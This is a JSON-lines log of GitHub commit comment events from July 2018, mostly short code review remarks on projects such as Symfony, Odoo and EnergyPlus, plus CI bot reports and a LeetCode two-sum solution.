{"id":"7954977821","type":"CommitCommentEvent","actor":{"login":"WangEnzhun"},"repo":{"name":"WangEnzhun/LeetCode"},"payload":{"comment":{"id":29682371,"position":null,"line":null,"path":null,"commit_id":"c8b3d85760b72a784f977c3437034d5ab897625d","created_at":"2018-07-12T09:16:19Z","updated_at":"2018-07-12T09:16:19Z","author_association":"OWNER","body":"【Leetcode】1. 两数之和\r\n\r\n题目描述：\r\n\r\n给定一个整数数组和一个目标值，找出数组中和为目标值的两个数。\r\n\r\n你可以假设每个输入只对应一种答案，且同样的元素不能被重复利用。\r\n\r\n示例:\r\n\r\n给定 nums = [2, 7, 11, 15], target = 9\r\n\r\n因为 nums[0] + nums[1] = 2 + 7 = 9\r\n所以返回 [0, 1]\r\n解题思路：\r\n\r\n我是暴力破解的，暴力循环找到和为目标值的两个目标数。\r\n\r\nAC代码：\r\n\r\nclass Solution {\r\npublic:\r\n    vector<int> twoSum(vector<int>& nums, int target) {\r\n        vector<int> iOut(2);\r\n        for(int i=0;i<nums.size();i++)\r\n        {\r\n            for(int j=i+1;j<nums.size();j++)\r\n            {\r\n                if(target==(nums[i]+nums[j]))\r\n                {\r\n                    iOut[0]=i;\r\n                    iOut[1]=j;\r\n                    return iOut;\r\n                }\r\n            }\r\n        }\r\n    }\r\n};\r\n"}},"created_at":"2018-07-12T09:16:19Z"}
{"id":"7954979037","type":"CommitCommentEvent","actor":{"login":"saladjay"},"repo":{"name":"PanPanCN/WpfStudy.Demo"},"payload":{"comment":{"id":29682372,"position":null,"line":null,"path":null,"commit_id":"d18675d1406f14a43708236c98e56ca24e1f698e","created_at":"2018-07-12T09:16:33Z","updated_at":"2018-07-12T09:16:33Z","author_association":"NONE","body":"View或者View的部件也可以通过CommandParameter传入到ViewModel，请问附加属性的方式优点在哪里呢。"}},"created_at":"2018-07-12T09:16:33Z"}
{"id":"7954981098","type":"CommitCommentEvent","actor":{"login":"WangEnzhun"},"repo":{"name":"WangEnzhun/LeetCode"},"payload":{"comment":{"id":29682376,"position":null,"line":null,"path":null,"commit_id":"c8b3d85760b72a784f977c3437034d5ab897625d","created_at":"2018-07-12T09:16:55Z","updated_at":"2018-07-12T09:16:55Z","author_association":"OWNER","body":"1st "}},"created_at":"2018-07-12T09:16:55Z"}
{"id":"7954983991","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29682379,"position":16,"line":50,"path":"contracts/RockPaperScissors.sol","commit_id":"e3f31208a6332e53a82c47328eae8db989f945c5","created_at":"2018-07-12T09:17:25Z","updated_at":"2018-07-12T09:17:25Z","author_association":"OWNER","body":"That's because of the logic of the decideOutcome function"}},"created_at":"2018-07-12T09:17:25Z"}
{"id":"7954985372","type":"CommitCommentEvent","actor":{"login":"paxarpp"},"repo":{"name":"cavy24/React-Redux"},"payload":{"comment":{"id":29682382,"position":28,"line":28,"path":"React-Redux/src/app/components/blogpost/BlogPost.js","commit_id":"8cd3dcd1b0af54caca275269c1c9b77abc306ee8","created_at":"2018-07-12T09:17:41Z","updated_at":"2018-07-12T09:17:41Z","author_association":"NONE","body":"`\r\nreturn (\r\n  <div style = {div_style} onClick = {this.onChange}>\r\n    <div className = \"blog-post\">\r\n      <h2 className=\"blog-post-title\">{this.props.titleBlogItem}</h2>\r\n      <div className = \"blog-post-meta\">\r\n        {this.props.descriptionBlogItem}\r\n      </div>\r\n      {this.props.textBlogItem}\r\n      <p className = \"pager\">\r\n        <Link to={`/blog/${this.props.hrefBlogPost}`}>\r\n          <button>{this.props.nameButton}</button>\r\n        </Link>\r\n      </p>\r\n    </div>\r\n  </div>\r\n)\r\n`"}},"created_at":"2018-07-12T09:17:41Z"}
{"id":"7954985383","type":"CommitCommentEvent","actor":{"login":"dunglas"},"repo":{"name":"symfony/symfony"},"payload":{"comment":{"id":29682383,"position":4,"line":4,"path":".github/CODEOWNERS","commit_id":"8c62ecfad2001fe062559fd4a2f8893c31500411","created_at":"2018-07-12T09:17:41Z","updated_at":"2018-07-12T09:17:41Z","author_association":"MEMBER","body":"If Nicolas wants to get notifications for this file, the CODEOWNERS format allows to add as GitHub accounts as we need after the path."}},"created_at":"2018-07-12T09:17:41Z"}
{"id":"7954985441","type":"CommitCommentEvent","actor":{"login":"ferjm"},"repo":{"name":"ceyusa/media"},"payload":{"comment":{"id":29682384,"position":32,"line":32,"path":"servo-media/src/backends/gstreamer/player.rs","commit_id":"81ad89df7ae9fea5e266382daae8aeb5b364e95f","created_at":"2018-07-12T09:17:42Z","updated_at":"2018-07-12T09:17:42Z","author_association":"NONE","body":"We shouldn't be using all these `unwrap`s here. I would make this function return a Result<Frame, ()> instead."}},"created_at":"2018-07-12T09:17:42Z"}
{"id":"7954990607","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29682392,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-12T09:18:38Z","updated_at":"2018-07-12T09:18:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T09:18:38Z"}
{"id":"7954996748","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29682397,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-12T09:19:45Z","updated_at":"2018-07-12T09:19:45Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T09:19:45Z"}
{"id":"7954997117","type":"CommitCommentEvent","actor":{"login":"paxarpp"},"repo":{"name":"cavy24/React-Redux"},"payload":{"comment":{"id":29682398,"position":17,"line":17,"path":"React-Redux/src/app/components/blogpost/BlogPost.js","commit_id":"8cd3dcd1b0af54caca275269c1c9b77abc306ee8","created_at":"2018-07-12T09:19:49Z","updated_at":"2018-07-12T09:19:49Z","author_association":"NONE","body":"вложенные элементы ровняйте\r\n\r\nиспользуйте esLint для форматирования кода"}},"created_at":"2018-07-12T09:19:49Z"}
{"id":"7954998205","type":"CommitCommentEvent","actor":{"login":"filomon"},"repo":{"name":"naverus/arpa"},"payload":{"comment":{"id":29682401,"position":107,"line":373,"path":"app/arpa_components/arpa-bus-models/arpa-bus-model-form/arpa-bus-model-form.html","commit_id":"989decde5d444cb7266a19a2ce5d08f946114397","created_at":"2018-07-12T09:20:01Z","updated_at":"2018-07-12T09:20:01Z","author_association":"COLLABORATOR","body":"La función isReadonlyEntity debería de ser declarado en la forma estándar isReadOnlyEntity"}},"created_at":"2018-07-12T09:20:01Z"}
{"id":"7954998318","type":"CommitCommentEvent","actor":{"login":"TwolDE"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":29682402,"position":null,"line":null,"path":null,"commit_id":"226d1cd9258d7386fc7d20dff3a81f21a6526b99","created_at":"2018-07-12T09:20:02Z","updated_at":"2018-07-12T09:20:02Z","author_association":"NONE","body":"parse error linux-dags - blank line after deleted line in linux-dags_3.9.7.bb"}},"created_at":"2018-07-12T09:20:02Z"}
{"id":"7955000352","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29682405,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-12T09:20:24Z","updated_at":"2018-07-12T09:20:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T09:20:24Z"}
{"id":"7955001772","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29682410,"position":null,"line":null,"path":null,"commit_id":"707b55eed4fc110d1508fa97f5944fb0cb26ad1e","created_at":"2018-07-12T09:20:40Z","updated_at":"2018-07-12T09:20:40Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - Win64-Windows-7-VisualStudio-14: OK (2923 of 2930 tests passed, 29 test warnings)\n\nMessages:\n\n * 16 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 8 tests had: EIO diffs.\n * 6 tests had: ESO big diffs.\n * 4 tests had: Table big diffs.\n * 12 tests had: ERR diffs.\n * 4 tests had: RDD diffs.\n * 2 tests had: MTR big diffs.\n * 2 tests had: ESO small diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 624\n * Failed: 1\n\nregression Test Summary\n * Passed: 617\n * Failed: 6\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-707b55eed4fc110d1508fa97f5944fb0cb26ad1e-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-707b55eed4fc110d1508fa97f5944fb0cb26ad1e-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.76%25-yellow.png)</a> \n"}},"created_at":"2018-07-12T09:20:40Z"}
{"id":"7955004579","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29682419,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-12T09:21:13Z","updated_at":"2018-07-12T09:21:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T09:21:13Z"}
{"id":"7955005698","type":"CommitCommentEvent","actor":{"login":"gedge"},"repo":{"name":"ONSdigital/go-ns"},"payload":{"comment":{"id":29682420,"position":6,"line":30,"path":"clients/identity/authentication.go","commit_id":"6d7e9cb49c63b48ed23e57a8c22efb97d11a9f5a","created_at":"2018-07-12T09:21:25Z","updated_at":"2018-07-12T09:21:25Z","author_association":"CONTRIBUTOR","body":"can you reflect these name changes in\r\n- `clients/identity/authentication_test.go`\r\n- `identity/identity.go`\r\nplease"}},"created_at":"2018-07-12T09:21:25Z"}
{"id":"7955008617","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29682426,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-12T09:21:57Z","updated_at":"2018-07-12T09:21:57Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T09:21:57Z"}
{"id":"7955010506","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29682435,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-12T09:22:19Z","updated_at":"2018-07-12T09:22:19Z","author_association":"NONE","body":"After a few thousand of games the worker start to timeout again.\r\nI will leave it running and see if things can get worse, and if that is the case I will try to solve it without rebooting the machine."}},"created_at":"2018-07-12T09:22:19Z"}
{"id":"7955010638","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29682436,"position":null,"line":null,"path":null,"commit_id":"e3f31208a6332e53a82c47328eae8db989f945c5","created_at":"2018-07-12T09:22:20Z","updated_at":"2018-07-12T09:22:20Z","author_association":"OWNER","body":"It wasn't finished yet with the development"}},"created_at":"2018-07-12T09:22:20Z"}
{"id":"7955012077","type":"CommitCommentEvent","actor":{"login":"xmo-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29682440,"position":21,"line":93,"path":"addons/mail/wizard/mail_resend_message.py","commit_id":"62591c58f8abded96b5fedcc4d9760550b7bdf18","created_at":"2018-07-12T09:22:37Z","updated_at":"2018-07-12T09:22:37Z","author_association":"COLLABORATOR","body":"The @api.multi is probably unneceessary as well."}},"created_at":"2018-07-12T09:22:37Z"}
{"id":"7955012264","type":"CommitCommentEvent","actor":{"login":"filomon"},"repo":{"name":"naverus/arpa"},"payload":{"comment":{"id":29682441,"position":115,"line":381,"path":"app/arpa_components/arpa-bus-models/arpa-bus-model-form/arpa-bus-model-form.html","commit_id":"989decde5d444cb7266a19a2ce5d08f946114397","created_at":"2018-07-12T09:22:39Z","updated_at":"2018-07-12T09:22:39Z","author_association":"COLLABORATOR","body":"Corregir la ortografía del comentario "}},"created_at":"2018-07-12T09:22:39Z"}
{"id":"7955012630","type":"CommitCommentEvent","actor":{"login":"saschanaz"},"repo":{"name":"Microsoft/TSJS-lib-generator"},"payload":{"comment":{"id":29682442,"position":53,"line":903,"path":"src/emitter.ts","commit_id":"e29b2ec8fac090be53d72caf84b05fe40793fe87","created_at":"2018-07-12T09:22:43Z","updated_at":"2018-07-12T09:22:43Z","author_association":"CONTRIBUTOR","body":"printLine(\" {\") ?"}},"created_at":"2018-07-12T09:22:43Z"}
{"id":"7955015245","type":"CommitCommentEvent","actor":{"login":"saschanaz"},"repo":{"name":"Microsoft/TSJS-lib-generator"},"payload":{"comment":{"id":29682449,"position":38,"line":836,"path":"src/emitter.ts","commit_id":"e29b2ec8fac090be53d72caf84b05fe40793fe87","created_at":"2018-07-12T09:23:13Z","updated_at":"2018-07-12T09:23:13Z","author_association":"CONTRIBUTOR","body":"printLine(\" {\") ?"}},"created_at":"2018-07-12T09:23:13Z"}
{"id":"7955015704","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29682450,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-12T09:23:18Z","updated_at":"2018-07-12T09:23:18Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T09:23:18Z"}
{"id":"7955018821","type":"CommitCommentEvent","actor":{"login":"doktoric"},"repo":{"name":"hortonworks/cloudbreak-documentation"},"payload":{"comment":{"id":29682457,"position":null,"line":null,"path":null,"commit_id":"5025e4ac8e238f3fcb699eebe27f94d2b8a315b8","created_at":"2018-07-12T09:23:52Z","updated_at":"2018-07-12T09:23:52Z","author_association":"CONTRIBUTOR","body":"@dbialek2 thanks the doc update"}},"created_at":"2018-07-12T09:23:52Z"}
{"id":"7955019252","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29682458,"position":null,"line":null,"path":null,"commit_id":"1364f6640dd969b53cef5b8fa6b035a978d6d6ed","created_at":"2018-07-12T09:23:58Z","updated_at":"2018-07-12T09:23:58Z","author_association":"OWNER","body":"Some refactoring again. Still I didn't test anything. I didn't check your comments yet on my previous commit. I just saw them. I will go through them this week. "}},"created_at":"2018-07-12T09:23:58Z"}
{"id":"7955022333","type":"CommitCommentEvent","actor":{"login":"tskogberg"},"repo":{"name":"barsoom/bankline_csv_import_file"},"payload":{"comment":{"id":29682461,"position":null,"line":null,"path":null,"commit_id":"8d422e8823b6eb0a9733a14fa990ada011998c2b","created_at":"2018-07-12T09:24:32Z","updated_at":"2018-07-12T09:24:32Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-12T09:24:32Z"}
{"id":"7955023984","type":"CommitCommentEvent","actor":{"login":"saschanaz"},"repo":{"name":"Microsoft/TSJS-lib-generator"},"payload":{"comment":{"id":29682467,"position":19,"line":99,"path":"src/emitter.ts","commit_id":"e29b2ec8fac090be53d72caf84b05fe40793fe87","created_at":"2018-07-12T09:24:50Z","updated_at":"2018-07-12T09:24:50Z","author_association":"CONTRIBUTOR","body":"\": endLine\" is redundant in modern JS/TS"}},"created_at":"2018-07-12T09:24:50Z"}
{"id":"7955026212","type":"CommitCommentEvent","actor":{"login":"GregorioDiStefano"},"repo":{"name":"mendersoftware/gui"},"payload":{"comment":{"id":29682470,"position":6,"line":97,"path":"src/js/components/help/connecting-devices/raspberry-pi-3.js","commit_id":"c69b2ffde29709c14cf28caa649272357ea70094","created_at":"2018-07-12T09:25:15Z","updated_at":"2018-07-12T09:25:15Z","author_association":"CONTRIBUTOR","body":"<a href=\"[url]\">"}},"created_at":"2018-07-12T09:25:15Z"}
{"id":"7955045863","type":"CommitCommentEvent","actor":{"login":"vendethiel"},"repo":{"name":"MoarVM/MoarVM"},"payload":{"comment":{"id":29682513,"position":7,"line":2565,"path":"src/spesh/optimize.c","commit_id":"3727d18b979b3be66cde085f973e86cf0d17cc0c","created_at":"2018-07-12T09:28:49Z","updated_at":"2018-07-12T09:28:49Z","author_association":"CONTRIBUTOR","body":"typo, \"elimiante\""}},"created_at":"2018-07-12T09:28:49Z"}
{"id":"7955046984","type":"CommitCommentEvent","actor":{"login":"Robbbert"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29682515,"position":null,"line":null,"path":null,"commit_id":"35dfa5372494e5f7485a0736cabf8f6e730b5dc1","created_at":"2018-07-12T09:29:02Z","updated_at":"2018-07-12T09:29:02Z","author_association":"CONTRIBUTOR","body":"Validation errors."}},"created_at":"2018-07-12T09:29:02Z"}
{"id":"7955048303","type":"CommitCommentEvent","actor":{"login":"Suil3File"},"repo":{"name":"Suil3File/iOSOpenDev"},"payload":{"comment":{"id":29682517,"position":null,"line":null,"path":null,"commit_id":"e6ae05090731d590cb0ef1d2c287a5e58e5d98f7","created_at":"2018-07-12T09:29:16Z","updated_at":"2018-07-12T09:29:16Z","author_association":"OWNER","body":"e6ae050"}},"created_at":"2018-07-12T09:29:16Z"}
{"id":"7955051644","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29682526,"position":68,"line":42,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-12T09:29:53Z","updated_at":"2018-07-12T09:29:53Z","author_association":"NONE","body":"I did not talk about `/** */`, but yes, feel free to add them, there is no harm.\r\nBy transaction parameters I meant something like \"input data\" here https://etherscan.io/tx/0x54f02ee830525646546e063de1270c8702fabff8ff91c875fd31130e7473ffa6. That's public."}},"created_at":"2018-07-12T09:29:53Z"}
{"id":"7955056560","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29682539,"position":73,"line":44,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-12T09:30:44Z","updated_at":"2018-07-12T09:30:44Z","author_association":"NONE","body":"Sounds on the right track. I will comment on the code proper ;)"}},"created_at":"2018-07-12T09:30:44Z"}
{"id":"7955059617","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29682546,"position":102,"line":72,"path":"src/main/java/abc/University.java","commit_id":"b47857448e48eff5e8d29ac20012341cd06faf97","created_at":"2018-07-12T09:31:17Z","updated_at":"2018-07-12T09:31:17Z","author_association":"COLLABORATOR","body":"Why you put all methods together? Separate them by classes according to their entities"}},"created_at":"2018-07-12T09:31:17Z"}
{"id":"7955062222","type":"CommitCommentEvent","actor":{"login":"kSpacer201"},"repo":{"name":"RandomDeveloperM/pyrocopy"},"payload":{"comment":{"id":29682553,"position":null,"line":null,"path":null,"commit_id":"f30de1e305f3ccd3f9765cbe9652b5d9beddb675","created_at":"2018-07-12T09:31:45Z","updated_at":"2018-07-12T09:31:45Z","author_association":"NONE","body":"- fixed problems \r\n  - copy , when copy files, not forcecopy \r\n  - mirror , when mirror from a  to  b , excludeDirs=['.git'] ,  a/.git will be skipped , b/.git will be deleted \r\n  - when process symlink , if dst-symlink existed , it will break with Error"}},"created_at":"2018-07-12T09:31:45Z"}
{"id":"7955062862","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29682554,"position":101,"line":63,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-12T09:31:52Z","updated_at":"2018-07-12T09:31:52Z","author_association":"NONE","body":"I think I will need to see an implementation first. "}},"created_at":"2018-07-12T09:31:52Z"}
{"id":"7955065931","type":"CommitCommentEvent","actor":{"login":"Andrewxu1"},"repo":{"name":"Andrewxu1/VGC_XCL"},"payload":{"comment":{"id":29682561,"position":null,"line":null,"path":null,"commit_id":"227798cf8ee9cb87fe74a66ecab0bc6e83d2c0ce","created_at":"2018-07-12T09:32:26Z","updated_at":"2018-07-12T09:32:26Z","author_association":"OWNER","body":"ASIS"}},"created_at":"2018-07-12T09:32:26Z"}
{"id":"7955065979","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29682562,"position":43,"line":128,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"468b1374c450b3150e8055a0beed17b62af8e71b","created_at":"2018-07-12T09:32:27Z","updated_at":"2018-07-12T09:32:27Z","author_association":"OWNER","body":"introduce function: isStanardAnalyzer -> null or 'StandardAnalyzer  or FQ 'StandardAnalyzer'"}},"created_at":"2018-07-12T09:32:27Z"}
{"id":"7955066179","type":"CommitCommentEvent","actor":{"login":"jpountz"},"repo":{"name":"nknize/lucene-solr"},"payload":{"comment":{"id":29682563,"position":63,"line":63,"path":"lucene/sandbox/src/java/org/apache/lucene/search/LatLonPolygonBoundingBoxQuery.java","commit_id":"db47b7490243043b2581a071fe3efe63c7d393c3","created_at":"2018-07-12T09:32:29Z","updated_at":"2018-07-12T09:32:29Z","author_association":"NONE","body":"should we call encodeXXXCeil for the min lat and min lon?"}},"created_at":"2018-07-12T09:32:29Z"}
{"id":"7955066731","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29682564,"position":52,"line":150,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"468b1374c450b3150e8055a0beed17b62af8e71b","created_at":"2018-07-12T09:32:35Z","updated_at":"2018-07-12T09:32:35Z","author_association":"OWNER","body":"is it required? "}},"created_at":"2018-07-12T09:32:35Z"}
{"id":"7955066852","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29682565,"position":null,"line":null,"path":null,"commit_id":"86b95408fdd8b8131ad2d8064a71a01920c1db2c","created_at":"2018-07-12T09:32:36Z","updated_at":"2018-07-12T09:32:36Z","author_association":"NONE","body":"fix_restrictive_cli (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2972 of 2972 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-86b95408fdd8b8131ad2d8064a71a01920c1db2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-86b95408fdd8b8131ad2d8064a71a01920c1db2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T09:32:36Z"}
{"id":"7955067904","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29682568,"position":123,"line":72,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-12T09:32:48Z","updated_at":"2018-07-12T09:32:48Z","author_association":"NONE","body":"Aha! I said make it `public`, I did not say change it so much that you introduce storage and this function changes storage."}},"created_at":"2018-07-12T09:32:48Z"}
{"id":"7955068600","type":"CommitCommentEvent","actor":{"login":"joakim-brannstrom"},"repo":{"name":"joakim-brannstrom/dextool"},"payload":{"comment":{"id":29682570,"position":19,"line":null,"path":"plugin/eqdetect/source/dextool/plugin/eqdetect/runner.d","commit_id":"a5c75ac924591f6346057780b565dfbfe3147bb6","created_at":"2018-07-12T09:32:57Z","updated_at":"2018-07-12T09:32:57Z","author_association":"OWNER","body":"Tip: remove from std.file is recommended. Avoids problems with going out to the shell such as escaping, shell dependency, dep on rm etc"}},"created_at":"2018-07-12T09:32:57Z"}
{"id":"7955071778","type":"CommitCommentEvent","actor":{"login":"JanTvrdik"},"repo":{"name":"nette/security"},"payload":{"comment":{"id":29682573,"position":null,"line":null,"path":null,"commit_id":"bc0f81d34099f8ba4fb4f0d1d260c1e39d80976e","created_at":"2018-07-12T09:33:32Z","updated_at":"2018-07-12T09:33:32Z","author_association":"CONTRIBUTOR","body":"This is a bad idea because there is no guarantee that `PASSWORD_DEFAULT` will work with the options you're providing, e.g. `PASSWORD_ARGON2I` requires different options."}},"created_at":"2018-07-12T09:33:32Z"}
{"id":"7955071989","type":"CommitCommentEvent","actor":{"login":"auroc10"},"repo":{"name":"auroc10/Lab"},"payload":{"comment":{"id":29682574,"position":null,"line":null,"path":null,"commit_id":"bb84896442d16f19edbe62414d5df2313deb75a1","created_at":"2018-07-12T09:33:34Z","updated_at":"2018-07-12T09:33:34Z","author_association":"OWNER","body":"Ejercicios 1"}},"created_at":"2018-07-12T09:33:34Z"}
